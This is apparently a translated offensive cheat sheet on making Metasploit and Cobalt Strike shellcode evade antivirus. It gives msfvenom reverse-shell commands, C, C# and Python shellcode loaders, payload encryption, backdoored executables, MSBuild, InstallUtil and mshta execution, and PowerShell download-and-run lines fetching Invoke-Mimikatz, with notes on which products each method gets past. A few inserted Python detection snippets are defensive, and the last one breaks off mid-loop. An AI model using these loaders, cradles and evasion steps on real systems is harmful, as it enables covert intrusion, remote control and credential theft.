AV Evasion

MSF shellcode AV evasion

nps_payload

>python nps_payload.py  (generate the payload as usual)
>msfconsole -r msbuild_nps.rc  (start the listener)
>%windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe xx.xml
>wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml
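When run normally, the session is lost once the msbuild process ends; save the following as a .bat file and run that instead.
Migrate to another process immediately after getting the session.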
@echo off
echo [*] Please Wait, preparing software ..
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\xxx.xml
exit

Encoders

>set EnableStageEncoding true
>set stageencoder x86/fnstenv_mov  (encode the stage for evasion)
>set stageencodingfallback false
&
>msfvenom --list encoders  (list the available encoders)

C/C++ source-level evasion

>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f c -o 1.c
-i: encode 20 times
The MSF listener must have automatic process migration set: set autorunscript migrate -n explorer.exe

Execution via function pointer

unsigned char buf[] =
"shellcode";
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // Windows console program: do not show the black console window
main()
{
    ( (void(*)(void))&buf)();
}
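Build with VC 6.0, then run on the target machine.

Currently this does not get past Huorong; it passes both the static and dynamic checks of 360.

Allocating dynamic memory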

#include <Windows.h>
#include <stdio.h>
#include <string.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // Windows console program: do not show the black console window
unsigned char buf[] =
"shellcode";
main()
{
    char *Memory;
    Memory=VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(Memory, buf, sizeof(buf));
    ((void(*)())Memory)();
}

Inline assembly

#include <windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char shellcode[] ="";
void main()
{
    __asm
    {
        mov eax, offset shellcode
        jmp eax
    }
}

Forced type cast

#include <windows.h>
#include <stdio.h>
unsigned char buf[] ="";
void main()
{
 ((void(WINAPI*)(void))&buf)();
}

Assembly junk instructions

#include <windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char shellcode[] ="";
void main()
{
        __asm
    {
        mov eax, offset shellcode
        _emit 0xFF  
        _emit 0xE0
    }
}
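
The loaders above that jump straight into a data buffer rely on `#pragma comment(linker, "/section:.data,RWE")`, which leaves a section that is both writable and executable in the PE section table. The following Python check is an added example, not code from the original post; it parses the section table and reports such sections, and the two sample images are header-only byte strings constructed for the demonstration.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def wx_sections(image: bytes) -> list:
    """Return the names of PE sections mapped both writable and executable."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    if coff + 20 > len(image):
        raise ValueError("truncated COFF header")
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, coff)
    table = coff + 20 + opt_size          # section table follows the optional header
    flagged = []
    for i in range(nsections):
        off = table + 40 * i              # each section header is 40 bytes
        if off + 40 > len(image):
            raise ValueError("truncated section table")
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        (flags,) = struct.unpack_from("<I", image, off + 36)
        if flags & IMAGE_SCN_MEM_EXECUTE and flags & IMAGE_SCN_MEM_WRITE:
            flagged.append(name)
    return flagged


def build_headers(sections) -> bytes:
    """Constructed sample: PE headers only (no code or data), for testing."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name, 0x1000, 0x1000 * (i + 1),
                    0, 0, 0, 0, 0, 0, flags)
        for i, (name, flags) in enumerate(sections)
    )
    return dos + b"PE\0\0" + coff + table


# Default linker output: .text is read+execute, .data is read+write.
NORMAL = build_headers([(b".text", 0x60000020), (b".data", 0xC0000040)])
# Effect of /section:.data,RWE: .data also carries the execute bit.
RWE_DATA = build_headers([(b".text", 0x60000020), (b".data", 0xE0000040)])

if __name__ == "__main__":
    print(wx_sections(NORMAL), wx_sections(RWE_DATA))
```

Loaders that obtain executable memory at run time with VirtualAlloc and PAGE_EXECUTE_READWRITE do not show up in the section table, so this check covers only the linker-flag variants.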

XOR encryption

Install: https://github.com/Arno0x/ShellcodeWrapper
Generate the payload in raw format
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f raw -o shell.raw

Encrypt
> python shellcode_encoder.py -cpp -cs -py shell.raw thisiskey xor
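The generated .py file is compiled with py2exe and run
The generated .cs file is compiled with csc.exe and run
The generated .cpp file is compiled with VC 6.0 with precompiled headers disabled, then run

Remote thread injection

Currently this gets past Huorong but not 360; the techniques can be combined.
Create a new C++ console project in VS
Right-click > Properties, and set Use of MFC to "Use MFC in a Static Library"
Generate shellcode in C format and paste it into remote inject.cpp

Build the project
The session comes online successfully and a calc process is started

Loader-based evasion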

shellcode_launcher

https://github.com/clinicallyinane/shellcode_launcher/
Generate the payload (raw)
>msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f raw -o shellcode.raw
Load it with the loader
>shellcode_launcher.exe -i shellcode.raw

SSI loading

https://github.com/DimopoulosElias/SimpleShellcodeInjector
Generate the payload (C)
>msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f c -o shellcode.c
Run
>cat shellcode.c |grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"

Start the MSF listener
You can compile it yourself with MinGW
>gcc SimpleShellcodeInjector.c -o xxx.exe
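Run
>xxx.exe <generated encoded string>

C# source-level evasion

Direct compilation

Generate the payload
The MSF listener must have automatic process migration set: set autorunscript migrate -n explorer.exe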
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txt
Start the MSF listener
Paste the payload into the marked position
    using System;
    using System.Runtime.InteropServices;
    namespace TCPMeterpreterProcess
    {
        class Program
        {
            static void Main(string[] args)
            {
                byte[] shellcode = new byte[] {payload here};
                UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
                Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
                IntPtr hThread = IntPtr.Zero;
                UInt32 threadId = 0;
                // prepare data
                IntPtr pinfo = IntPtr.Zero;
                // execute native code
                hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
                WaitForSingleObject(hThread, 0xFFFFFFFF);
            }
            private static UInt32 MEM_COMMIT = 0x1000;
            private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
            [DllImport("kernel32")]
            private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
            UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
            [DllImport("kernel32")]
            private static extern bool VirtualFree(IntPtr lpAddress,
            UInt32 dwSize, UInt32 dwFreeType);
            [DllImport("kernel32")]
            private static extern IntPtr CreateThread(
                UInt32 lpThreadAttributes,
                UInt32 dwStackSize,
                UInt32 lpStartAddress,
                IntPtr param,
                UInt32 dwCreationFlags,
                ref UInt32 lpThreadId
            );
            [DllImport("kernel32")]
            private static extern bool CloseHandle(IntPtr handle);
            [DllImport("kernel32")]
            private static extern UInt32 WaitForSingleObject(
                IntPtr hHandle,
                UInt32 dwMilliseconds
            );
            [DllImport("kernel32")]
            private static extern IntPtr GetModuleHandle(
                string moduleName
            );
            [DllImport("kernel32")]
            private static extern UInt32 GetProcAddress(
                IntPtr hModule,
                string procName
            );
            [DllImport("kernel32")]
            private static extern UInt32 LoadLibrary(
                string lpFileName
            );
            [DllImport("kernel32")]
            private static extern UInt32 GetLastError();
        }
    }
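Create a C# .NET Framework console project in Visual Studio and compile it; the result gets past AV.

Encryption

Generate the payload
The MSF listener must have automatic process migration set: set autorunscript migrate -n explorer.exe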
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txt
Paste in the payload, then compile and run to encrypt it
    using System;
    using System.Collections.Generic;
    using System.IO;
    using System.Linq;
    using System.Security.Cryptography;
    using System.Text;
    using System.Threading.Tasks;
    using System.Reflection;
    using System.Runtime.CompilerServices;
    using System.Runtime.InteropServices;
    namespace Payload_Encrypt_Maker
    {
        class Program
        {
            // Encryption key; it can be changed as long as KEY stays identical in the encryptor and decryptor sources
            static byte[] KEY = { 0x11, 0x22, 0x11, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x11, 0x01, 0x11, 0x11, 0x00, 0x00 };
            static byte[] IV = { 0x00, 0xcc, 0x00, 0x00, 0x00, 0xcc };
            static byte[] payload = { payload here };    // replace with the shellcode generated by MSF
            private static class Encryption_Class
            {
                public static string Encrypt(string key, string data)
                {
                    Encoding unicode = Encoding.Unicode;
                    return Convert.ToBase64String(Encrypt(unicode.GetBytes(key), unicode.GetBytes(data)));
                }
                public static byte[] Encrypt(byte[] key, byte[] data)
                {
                    return EncryptOutput(key, data).ToArray();
                }
                private static byte[] EncryptInitalize(byte[] key)
                {
                    byte[] s = Enumerable.Range(0, 256)
                    .Select(i => (byte)i)
                    .ToArray();
                    for (int i = 0, j = 0; i < 256; i++)
                    {
                        j = (j + key[i % key.Length] + s[i]) & 255;
                        Swap(s, i, j);
                    }
                    return s;
                }
                private static IEnumerable<byte> EncryptOutput(byte[] key, IEnumerable<byte> data)
                {
                    byte[] s = EncryptInitalize(key);
                    int i = 0;
                    int j = 0;
                    return data.Select((b) =>
                    {
                        i = (i + 1) & 255;
                        j = (j + s[i]) & 255;
                        Swap(s, i, j);
                        return (byte)(b ^ s[(s[i] + s[j]) & 255]);
                    });
                }
                private static void Swap(byte[] s, int i, int j)
                {
                    byte c = s[i];
                    s[i] = s[j];
                    s[j] = c;
                }
            }
            static void Main(string[] args)
            {
                byte[] result = Encryption_Class.Encrypt(KEY, payload);
                int b = 0;
                for (int i = 0; i < result.Length; i++)
                {
                    b++;
                    if (i == result.Length + 1)
                    { Console.Write(result[i].ToString()); }
                    if (i != result.Length) { Console.Write(result[i].ToString() + ","); }
                }
            }
        }
    }

Compile the decryptor
    using System;
    using System.Collections.Generic;
    using System.Linq;
    using System.Text;
    using System.Runtime.InteropServices;
    using System.Threading;
    using System.Reflection;
    using System.Runtime.CompilerServices;

    namespace NativePayload_Reverse_tcp
    {
        public class Program
    {
            public static void Main()
            {
                Shellcode.Exec();
      }
    }
    class Shellcode
    {
      public static void Exec()
      {
        string Payload_Encrypted;
        Payload_Encrypted = "payload here";
        string[] Payload_Encrypted_Without_delimiterChar = Payload_Encrypted.Split(',');
        byte[] _X_to_Bytes = new byte[Payload_Encrypted_Without_delimiterChar.Length];
        for (int i = 0; i < Payload_Encrypted_Without_delimiterChar.Length; i++)
        {
          byte current = Convert.ToByte(Payload_Encrypted_Without_delimiterChar[i].ToString());
          _X_to_Bytes[i] = current;
        }
        // Decryption key; it can be changed as long as KEY stays identical in the encryptor and decryptor sources
                byte[] KEY = { 0x11, 0x22, 0x11, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x11, 0x01, 0x11, 0x11, 0x00, 0x00 };
                byte[] MsfPayload = Decrypt(KEY, _X_to_Bytes);
                // load the shellcode
                IntPtr returnAddr = VirtualAlloc((IntPtr)0, (uint)Math.Max(MsfPayload.Length, 0x1000), 0x3000, 0x40);
                Marshal.Copy(MsfPayload, 0, returnAddr, MsfPayload.Length);
                CreateThread((IntPtr)0, 0, returnAddr, (IntPtr)0, 0, (IntPtr)0);
                Thread.Sleep(2000);
            }
            public static byte[] Decrypt(byte[] key, byte[] data)
            {
                return EncryptOutput(key, data).ToArray();
            }
            private static byte[] EncryptInitalize(byte[] key)
            {
                byte[] s = Enumerable.Range(0, 256)
                .Select(i => (byte)i)
                .ToArray();
                for (int i = 0, j = 0; i < 256; i++)
                {
                    j = (j + key[i % key.Length] + s[i]) & 255;
                    Swap(s, i, j);
                }
                return s;
            }
            private static IEnumerable<byte> EncryptOutput(byte[] key, IEnumerable<byte> data)
            {
                byte[] s = EncryptInitalize(key);
                int i = 0;
                int j = 0;
                return data.Select((b) =>
                {
                    i = (i + 1) & 255;
                    j = (j + s[i]) & 255;
                    Swap(s, i, j);
                    return (byte)(b ^ s[(s[i] + s[j]) & 255]);
                    });
            }
            private static void Swap(byte[] s, int i, int j)
            {
                byte c = s[i];
                s[i] = s[j];
                s[j] = c;
            }
            [DllImport("kernel32.dll")]
            public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
            [DllImport("kernel32.dll")]
            public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
        }
    }

XOR/AES encoding

Similar to the XOR encryption above

CSC+InstallUtil

Generate the payload
The MSF listener must have automatic process migration set: set autorunscript migrate -n explorer.exe
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txt
Paste the payload into InstallUtil-Shellcode.cs and compile it with csc

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:C:\Users\y\Desktop\shell.exe C:\Users\y\Desktop\InstallUtil-ShellCode.cs

Run
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\y\Desktop\shell.exe

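Python source-level evasion

Loading C-format shellcode, packaged with pyinstaller

Generate the payload in C format
The MSF listener must have automatic process migration set: set autorunscript migrate -n explorer.exe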
>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f c -o /var/www/html/1.c
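Paste the shellcode into shellcode+c.py. On a 32-bit system install python, py2exe and pyinstaller, go to the C:\Python27\Scripts directory and package the .py file as an exe with the following command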
>python pyinstaller-script.py -F -w shellcode.py
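A dist folder is created in the directory; the exe file is inside it

Loading py-format shellcode, packaged with pyinstaller (*)

Generate the payload in py format
The MSF listener must have automatic process migration set: set autorunscript migrate -n explorer.exe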
>msfvenom -p windows/meterpreter/reverse_tcp LPORT=12138 LHOST=192.168.0.108 -e x86/shikata_ga_nai -i 11 -f py -o /var/www/html/1.py
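Paste the shellcode into shellcode+py.py. On a 32-bit system install python, py2exe and pyinstaller, go to the C:\Python27\Scripts directory and package the .py file as an exe with the following command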
>python pyinstaller-script.py --console --onefile shellcode.py
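A dist folder is created in the directory; the exe file is inside it

Packaging an exe with py2exe

Generate the payload in raw format
The MSF listener must have automatic process migration set: set autorunscript migrate -n explorer.exe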
>msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/shell.py
Install python and py2exe on a 32-bit system
Create setup.py in the same directory

from distutils.core import setup
import py2exe
setup(
name = "Meter",
description = "Python-based App",
version = "1.0",
console = ["shell.py"],
options = {"py2exe":{"bundle_files":1,"packages":"ctypes","includes":"base64,sys,socket,struct,time,code,platform,getpass,shutil",}},
zipfile = None
)
Run the packaging command
>python setup.py py2exe
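A dist folder is created in the current directory; the packaged exe is inside it

Base64 encoding + pyinstaller packaging

The MSF listener must have automatic process migration set: set autorunscript migrate -n explorer.exe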
>msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=192.168.0.108 LPORT=12138 -f c -o /var/www/html/1.c
Paste the shellcode into shellcode+base64+c.py
>python pyinstaller-script.py -F -w shellcode.py
A dist folder is created in the directory; the exe file is inside it

Separating the loader from the payload

hex

Generate the payload in C format
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f c -o /var/www/html/shell.c
Download k8final

Paste the shellcode in

Use
https://github.com/k8gege/scrun

or
>python scrun.py xxx
or
compile ScRunHex.py into an exe

Base64(*)

Generate the payload in C format
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f c -o /var/www/html/shell.c
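Download k8final

Paste the shellcode in

After hex-encoding it, paste the result in and Base64-encode it

Build the ScRunBase.py file to match the system's bitness, package it as an exe with pyinstaller, then run it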
https://gitee.com/RichChigga/scrun/blob/master/ScRunBase64.py
>python pyinstaller-script.py -F -w ScRunBase64.py

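DLL hijacking

Hijacking a trusted (whitelisted) DLL
Use Process Monitor to find the DLLs a program loads
Use Stud_PE to add the DLL to it
or
Generate a payload, make it evade AV and paste it in; check what software is on the target, find a hijackable DLL locally, and upload the file once the hijack is prepared.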

MSBuild

Link
https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20shellcode.xml
>msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f csharp
Remote execution
>wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml
Automatic process migration must be configured

GreatSCT

>use Bypass
>list
>use regasm/meterpreter/rev_tcp.py
>msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

Mshta

https://github.com/mdsecactivebreach/CACTUSTORCH/blob/master/CACTUSTORCH.hta
Generate
>msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/1.bin
>cat 1.bin |base64 -w 0

Copy the encoded content into

Run
>mshta http://192.168.0.106:1222/1.hta
360 detects it on execution; its static and dynamic scans do not detect it, and Huorong does not detect it
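
The MSBuild, InstallUtil and mshta invocations on this page each leave a recognisable process command line. The following Python sketch is an added example, not from the original post: it matches those command shapes in process-creation events (for example the CommandLine field of Sysmon Event ID 1); the rule names, host names and sample events are constructed for illustration.

```python
import re


def _rx(pattern):
    return re.compile(pattern, re.IGNORECASE)


# Every pattern of a rule must match the command line for the rule to fire.
RULES = {
    # msbuild.exe given a project file on a UNC share (\\host\share\file.ext)
    "msbuild_project_on_unc_share": [
        _rx(r'\bmsbuild\.exe\b'),
        _rx(r'(?<![\w\\])\\\\[^\\\s"]+\\[^\s"]+\.\w+'),
    ],
    # InstallUtil.exe /U with its logging switched off
    "installutil_uninstall_logging_off": [
        _rx(r'\binstallutil\.exe\b'),
        _rx(r'(?<!\S)/u(?!\S)'),
        _rx(r'(?<!\S)/logfile=(?!\S)|(?<!\S)/logtoconsole=false(?!\S)'),
    ],
    # mshta handed an http(s) URL instead of a local .hta file
    "mshta_remote_url": [
        _rx(r'\bmshta(?:\.exe)?\b'),
        _rx(r'\bhttps?://'),
    ],
}


def classify(cmdline):
    """Return the sorted names of all rules that match one command line."""
    return sorted(name for name, pats in RULES.items()
                  if all(p.search(cmdline) for p in pats))


def scan(events):
    """events: iterable of (host, cmdline); returns only the flagged ones."""
    return [(host, hits) for host, cmd in events if (hits := classify(cmd))]


# Constructed sample events: benign and suspicious use of the same binaries.
SAMPLE_EVENTS = [
    ("ws-014", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "
               r"C:\src\app\app.csproj /p:Configuration=Release"),
    ("ws-022", r"cmd.exe /c start C:\Windows\Microsoft.NET\Framework"
               r"\v4.0.30319\msbuild.exe \\fs01\drop\msbuild_nps.xml"),
    ("ws-022", r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe "
               r"/logfile= /LogToConsole=false /U C:\Users\y\Desktop\shell.exe"),
    ("srv-003", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319"
                r"\InstallUtil.exe /u C:\svc\Agent.exe"),
    ("ws-031", "mshta http://192.0.2.10:1222/1.hta"),
    ("ws-031", r"mshta.exe C:\apps\help\index.hta"),
]

if __name__ == "__main__":
    for host, hits in scan(SAMPLE_EVENTS):
        print(host, hits)
```

The rules key on argument shape rather than file names, so they should be tuned against a baseline of legitimate build and deployment jobs before alerting on them.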

InstallUtil

Covered in the intranet article

Veil

>use 1  (select the evasion module)
>list  (show the available payloads)
>use 7  (select the C-format payload)
>set LHOST/LPORT  (set the callback IP and port)
>generate  (generate)

The directly generated exe may be detected; currently it gets past 360 but not Huorong
Compile the C file with MinGW-w64
>gcc -o vel.exe veil.c -l ws2_32

RC4

>msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 lhost=192.168.0.108 lport=3333 RC4PASSWORD=123qwe!@# -f c

Binding

>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -e x86/shikata_ga_nai -x PsExec64.exe  -i 15 -f exe -o /var/www/html/payload4.exe

Evasion modules

>show evasion

Phantom-Evasion

Shellter

Only supports 32-bit programs
>apt install shellter
Specify an exe file

Select the payload

the-backdoor-factory

Check whether the file supports binding
>python backdoor.py -f /root/Desktop/putty.exe -S
Show which payloads this file supports
>python backdoor.py -f /root/Desktop/putty.exe -s show
reverse_shell_tcp_inline corresponds to the MSF setting
set payload windows/meterpreter/reverse_tcp
meterpreter_reverse_https_threaded corresponds to the MSF setting
set payload windows/meterpreter/reverse_https
iat_reverse_tcp_stager_threaded: repairs the IAT
user_supplied_shellcode_threaded: custom payload
Parameters
-s  specify the payload
-H  callback address
-P  callback port
-J  multiple code cave injection
>python backdoor.py -f ~/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.0.108 -P 12138 -J -o payload.exe
The backdoored file is generated in the backdoored directory
or
Generate the payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -e x86/shikata_ga_nai -i 5 -f raw -o shellcode.c
Custom
>python backdoor.py -f /root/putty.exe -s user_supplied_shellcode_threaded -U /root/shellcode.c  -o payload2.exe

zirikatu

hanzoInjection

https://github.com/P0cL4bs/hanzoInjection
Generate
>msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f raw -o /var/www/html/1.bin
>HanzoInjection.exe -p 1.bin -o 1.cs
Compile 1.cs
Properties > Build > Allow unsafe code

PowerShell evasion

Direct generation

>msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b '\x00' lhost=192.168.0.108 lport=12138 -f psh -o /var/www/html/1.ps1
Run
>powershell -ep bypass -noexit -file 1.ps1
Bypassing PowerShell behavior detection
>powershell -noexit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://192.168.0.108/1.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"

Loading with Invoke-Shellcode

Generate the code
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f powershell -o /var/www/html/1.ps1
Run on the target
> powershell -ep bypass
> IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.108/ps/powersploit/CodeExecution/Invoke-Shellcode.ps1')
> IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.108/1.ps1')
> Invoke-Shellcode -Shellcode ($buf) -Force

The protection software did not react

Invoke-Obfuscation

https://github.com/danielbohannon/Invoke-Obfuscation
Generate the code
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f psh -o /var/www/html/1.ps1
>powershell -ep bypass
>Import-Module .\Invoke-Obfuscation.psd1
>Invoke-Obfuscation
>set scriptpath C:\Users\y\Desktop\1.ps1
>encoding
>3  (choose the encoding method)
>out C:\Users\y\Desktop\ok.ps1  (save)

Run
>powershell -ep bypass -noexit -file ok.ps1

Xencrypt

https://github.com/the-xentropy/xencrypt/blob/master/xencrypt.ps1
>Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 100  (recursive layering to evade dynamic detection)

>Invoke-Xencrypt -infile .\Invoke-Mimikatz.ps1 -outfile mimi.ps1

PyFuscation

https://github.com/CBHue/PyFuscation
Obfuscates functions, parameters and variables
>python3 PyFuscation.py -fvp --ps Invoke-Mimikatz.ps1

String splitting + compiling in C

#include<stdio.h>
#include<stdlib.h>
int main(){
system("powershell $c2='IEX (New-Object Net.WebClient).Downlo';$c3='adString(''http://x.x.x.x/a'')'; $Text=$c2+$c3; IEX(-join $Text)");
return 0;
}

Behavior detection

>powershell.exe -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/Invoke-Mimikatz.ps1');Invoke-Mimikatz"

Out-EncryptedScript

http://192.168.0.108/ps/powersploit/ScriptModification/Out-EncryptedScript.ps1
>Out-EncryptedScript -ScriptPath .\Invoke-Mimikatz.ps1 -Password shabiisme -Salt 123456

PS > IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.108/ps/powersploit/ScriptModification/Out-EncryptedScript.ps1")
PS > [String] $cmd = Get-Content .\evil.ps1
PS > Invoke-Expression $cmd
PS > $decrypted = de shabiisme 123456
PS > Invoke-Expression $decrypted
PS > Invoke-Mimikatz

Cobalt Strike PowerShell evasion

From: https://y4er.com/post/cobalt-strike-powershell-bypass/
powershell>$string = ''
powershell>$s = [Byte[]]$var_code = [System.Convert]::FromBase64String('[shellcode generated by CS]')
powershell>$s |foreach { $string = $string + $_.ToString()+','}
powershell>$string>c:\1.txt
Modify the PS script
[Byte[]]$var_code = [Byte[]](payload)
Then obfuscate the functions and variables
Bypassing interception of command execution
Use CS's argument spoofing
beacon > argue cmd.exe blablabla

Chunking-based evasion

Generate
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.0.108 LPORT=443 -f psh-net -o shity_shellcode.ps1

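First, a test: replace the shellcode in the ps1 file with a harmless string

It turns out it is still detected

This shows that most detections come from the PowerShell template rather than from the shellcode itself.
Several bypass methods follow
1. Split strings into several parts and create intermediate variables;
2. Add a large number of junk comments;
3. Add some junk instructions, such as loops or sleep instructions (useful against sandboxes).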
[DllImport("kernel32.dll")]
becomes
[DllImport("ke"+"rne"+"l32.dll")] # gets past Symantec
$przdE.ReferencedAssemblies.AddRange(@("System.dll",[PsObject].Assembly.Location))
becomes
$magic="Syst"+"em"+".dll";
$przdE.ReferencedAssemblies.AddRange(@($magic,[PsObject].Assembly.Location))
Splitting the shellcode
$sc0=<part 1 of the shellcode>; …$sc7=<part 8 of the shellcode>; [Byte[]]$tcomplete_sc=[System.Convert]::FromBase64String($sc0+$sc1+…+$sc7)
For some details, see
https://raw.githubusercontent.com/kmkz/Pentesting/master/AV_Evasion/AV_Bypass.ps1
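
String splitting as described above, and in the earlier download cradle that uses .Replace(), only defeats matching on the raw text. The following Python heuristic is an added example, not from the original post or the linked scripts: it folds literal concatenation, .Replace() on literals and simple variable assignments in logged script text (for example PowerShell script block logs), then reports keywords that appear only after folding; the keyword list and sample scripts are constructed.

```python
import re

# Heuristic constant folding for triage; this is not a full PowerShell parser.
SQ = r"'((?:[^']|'')*)'(?!')"      # single-quoted literal; '' escapes a quote
SQN = r"'(?:[^']|'')*'(?!')"       # the same literal, non-capturing
TERM = SQN + r"(?!\s*\.)"          # a literal that is not a method-call target
ANY_STR = re.compile(SQN + r'|"([^"`$]*)"')
REPLACE = re.compile(rf"{SQ}(?:\.Replace\(\s*{SQ}\s*,\s*{SQ}\s*\))?", re.I)
CHAIN = re.compile(rf"({TERM}(?:\s*\+\s*{TERM})+)|{SQN}")
ASSIGN = re.compile(rf"\$(\w+)\s*=\s*({SQN})\s*(?=;|\n|$)")
VAR_USE = re.compile(r"\$(\w+)\b(?!\s*=)")
KEYWORDS = ("downloadstring", "kernel32.dll", "system.dll")


def _raw(body):
    return body.replace("''", "'")


def _quote(value):
    return "'" + value.replace("'", "''") + "'"


def _do_replace(m):
    if m.group(2) is None:          # plain literal: consume it unchanged
        return m.group(0)
    return _quote(_raw(m.group(1)).replace(_raw(m.group(2)), _raw(m.group(3))))


def _do_concat(m):
    if m.group(1) is None:          # lone literal: consume it unchanged
        return m.group(0)
    return _quote("".join(_raw(b) for b in re.findall(SQ, m.group(1))))


def fold(script):
    """Fold 'a'+'b', 'x'.Replace('a','b') and $v='literal' uses to constants."""
    # Canonicalise plain double-quoted literals to single-quoted form.
    text = ANY_STR.sub(lambda m: m.group(0) if m.group(1) is None
                       else _quote(m.group(1)), script)
    for _ in range(20):             # bounded fixed-point iteration
        before = text
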